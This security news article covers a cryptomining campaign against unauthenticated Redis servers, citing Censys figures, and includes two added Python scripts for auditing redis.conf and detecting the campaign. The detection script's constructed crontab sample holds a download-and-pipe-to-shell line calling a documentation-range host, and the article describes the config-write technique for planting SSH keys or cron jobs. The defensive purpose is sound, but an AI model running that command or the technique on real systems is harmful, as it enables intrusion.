Threat actors targeted tens of thousands of unauthenticated Redis servers exposed on the Internet as part of a cryptocurrency mining campaign.
Redis is a popular open source data structure tool that can be used as an in-memory distributed database, message broker, or cache. The tool is not designed to be exposed on the Internet; however, the researchers detected tens of thousands of publicly accessible Redis instances without authentication.
Researcher Victor Zhu detailed a Redis vulnerability that could be exploited to compromise Redis instances exposed online.
“Under certain conditions, if Redis is running under the root account (or not at all), attackers can write an SSH public key file to the root account, logging in directly to the victim’s server via SSH. This can allow hackers to gain server privileges, delete or steal data, and even lead to encryption extortion, seriously jeopardizing normal business services.” reads the post published by Zhu on September 11, 2022.
Now, Censys researchers are warning of tens of thousands of unauthenticated Redis servers exposed on the Internet that are under attack.
Threat actors target these instances to install a cryptocurrency miner.
“There are 39,405 unauthenticated Redis services out of a total of 350,675 Redis services on the public Internet.” warns Censys. “Almost 50% of unauthenticated Redis services on the Internet show signs of an attempted compromise.”
“The general idea behind this exploitation technique is to configure Redis to write its file-based database to a directory that contains some method of authorizing a user (such as adding a key to ‘.ssh/authorized_keys’), or to start a process (such as adding a script to ‘/etc/cron.d’),” adds Censys.
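The technique Censys describes only works when the server accepts unauthenticated `CONFIG SET dir` / `CONFIG SET dbfilename` commands and runs with enough privilege to write into a sensitive directory. The following Python script is an added example (not code from Censys or the Redis project) that audits a `redis.conf` for the settings that make this possible: a bind on all interfaces, `protected-mode` disabled, no `requirepass`, a `dir` under a cron or SSH path, and a `CONFIG` command that has not been renamed away. The two configuration fragments are constructed for the demonstration; the password value is a placeholder.

```python
import re

# Constructed weak configuration: the shape of a server the report's technique works against.
WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
port 6379
# requirepass is commented out, so any client can issue CONFIG SET
# requirepass changeme
dir /var/spool/cron
dbfilename root
"""

# Constructed hardened counterpart; the requirepass value is a placeholder, not a real secret.
HARDENED_CONF = """\
bind 127.0.0.1 -::1
protected-mode yes
port 6379
requirepass REPLACE-WITH-LONG-RANDOM-SECRET
dir /var/lib/redis
dbfilename dump.rdb
rename-command CONFIG ""
"""

# Directories named in the report (cron spool, cron.d) plus SSH key locations.
SENSITIVE_DIRS = ("/var/spool/cron", "/etc/cron.d", "/root/.ssh", "/home/")


def parse_redis_conf(text):
    """Return {directive: [value, ...]} for active (non-comment, non-blank) lines.

    Redis keeps the last occurrence of a directive, so callers read [-1].
    """
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        conf.setdefault(key, []).append(value)
    return conf


def audit_redis_conf(text):
    """Return a list of human-readable findings; an empty list means no weak setting found."""
    conf = parse_redis_conf(text)
    findings = []

    # 1. Exposure: no bind directive, or a wildcard address, means every interface listens.
    binds = conf.get("bind", [])
    wildcard = ("0.0.0.0", "*", "::", "-::*")
    if not binds or any(b.split()[0] in wildcard for b in binds if b):
        findings.append("bind: listening on all interfaces")

    # 2. protected-mode is the safety net that refuses remote clients when no password is set.
    if conf.get("protected-mode", ["yes"])[-1].lower() != "yes":
        findings.append("protected-mode: disabled")

    # 3. Without requirepass, CONFIG SET dir/dbfilename is available to anyone who can connect.
    if not conf.get("requirepass"):
        findings.append("requirepass: no password set")

    # 4. A dump directory under cron or SSH paths is exactly what the attack relies on.
    dir_ = conf.get("dir", [""])[-1].strip('"')
    if any(dir_.startswith(p) for p in SENSITIVE_DIRS):
        findings.append(f"dir: database written under sensitive path {dir_}")

    # 5. Renaming CONFIG to the empty string removes the command from the client surface.
    renamed = conf.get("rename-command", [])
    if not any(r.split()[0].upper() == "CONFIG" for r in renamed if r):
        findings.append("rename-command: CONFIG still reachable by clients")

    return findings


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"{name}: {audit_redis_conf(conf) or 'no findings'}")
```

Run it against a real `redis.conf` by reading the file into `audit_redis_conf`. On Redis 6 and later, ACL rules are the preferred way to restrict `CONFIG` for ordinary users, but the `rename-command` check still catches the legacy configuration the report's population is most likely running.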
Experts found evidence of the ongoing hacking campaign: threat actors attempted to store malicious crontab entries in the “/var/spool/cron/root” file using various Redis keys prefixed with “backup”. The crontab entries allowed the attackers to execute a shell script hosted on a remote server.
The shell script was designed to perform the following malicious actions:
- Stops and disables any running security-related processes
- Stops and disables any running system monitoring process
- Removes and purges all security and system related log files, including shell histories (e.g. .bash_history)
- Adds a new SSH key to the root user’s authorized_keys file
- Disables the iptables firewall
- Installs various hacking and scanning tools such as “masscan”
- Installs and runs the XMRig cryptocurrency mining app
The researchers used a recent list of unauthenticated Redis services running on TCP port 6379 to run a unique scan that looked for the existence of the “backup1” key on each host. Censys found that of the 31,239 unauthenticated Redis servers on this list, 15,526 hosts had this set of keys. These instances were targeted by threat actors using the technique described above.
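Two of the indicators above are easy to check on hosts you administer: Redis keys prefixed with “backup”, and crontab entries that fetch and execute a remote script. The Python below is an added example (not code from the Censys report) that applies both checks to constructed sample data. A crontab written by Redis's RDB dump carries binary framing around the injected line, so the scanner decodes the file as Latin-1 and only flags lines that parse as a five-field cron schedule followed by a download-and-execute command. The key list and crontab bytes are constructed for the demonstration and use a documentation-range IP address.

```python
import re

# Constructed key listing, as returned by a KEYS or SCAN call on an affected server.
SAMPLE_KEYS = ["user:1001", "backup1", "backup2", "session:abc", "backup3", "backups_ok"]

# Constructed /var/spool/cron/root content: RDB-style framing around an injected cron line.
# The URL uses a TEST-NET address and is not a real indicator.
SAMPLE_CRON = (
    b"REDIS0009\xfa\tredis-ver\x055.0.7\xfe\x00\x00\x07backup1\x3e\n"
    b"\n"
    b"*/2 * * * * curl -fsSL http://198.51.100.23/init.sh | sh\n"
    b"\n"
    b"0 3 * * 0 /usr/local/bin/rotate-logs.sh\n"
    b"\xff\x00\x01\x02"
)

# Key names the report associates with the campaign: "backup" followed by a number.
BACKUP_KEY_RE = re.compile(r"^backup\d+$")

# Five schedule fields (numbers, *, /, ',', '-') followed by the command.
CRON_LINE_RE = re.compile(r"^\s*(?:[\d*/,\-]+\s+){5}(?P<cmd>\S.*)$")

# Download piped into a shell, or any remote URL in the command, is the pattern described above.
SUSPICIOUS_CMD_RE = re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b|https?://")


def flag_backup_keys(keys):
    """Return the keys matching the 'backup<N>' naming seen in the campaign."""
    return [k for k in keys if BACKUP_KEY_RE.match(k)]


def find_suspicious_cron_lines(raw):
    """Scan crontab bytes and return (line_number, command) for download-and-execute entries."""
    text = raw.decode("latin-1")  # never fails, so binary RDB framing does not abort the scan
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = CRON_LINE_RE.match(line)
        if not m:
            continue  # garbage or framing: cron ignores it and so do we
        cmd = m.group("cmd")
        if SUSPICIOUS_CMD_RE.search(cmd):
            hits.append((lineno, cmd))
    return hits


def assess(keys, crontab_bytes):
    """Combine both indicators into a single verdict for one host."""
    return {
        "backup_keys": flag_backup_keys(keys),
        "cron_hits": find_suspicious_cron_lines(crontab_bytes),
    }


if __name__ == "__main__":
    result = assess(SAMPLE_KEYS, SAMPLE_CRON)
    print("backup-style keys:", result["backup_keys"])
    for lineno, cmd in result["cron_hits"]:
        print(f"suspicious cron line {lineno}: {cmd}")
```

The legitimate weekly log rotation entry is left alone because it neither downloads nor references a URL; in a real deployment the key listing would come from `SCAN` rather than `KEYS` to avoid blocking a large instance, and the crontab bytes from the spool file itself.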
The majority of Redis servers exposed to the Internet are located in China (15.29%), followed by Germany (14.11%) and Singapore (12.43%).
“However, this does not mean that there are more than 15 thousand compromised hosts. The conditions necessary for this vulnerability to succeed are unlikely to exist for each of these hosts. The main reason many of these attempts will fail is that the Redis service must be run as a user with the proper permissions to write to the “/var/spool/cron” directory (i.e. root).” the report concludes. “However, this could be the case when running Redis inside a container (such as docker), where the process could be seen running as root and allow the attacker to write these files. But in this case, only the container is affected, not the physical host.”
The report also includes a list of mitigation measures for these attacks.
Pierluigi Paganini
(SecurityAffairs – hacking, mining)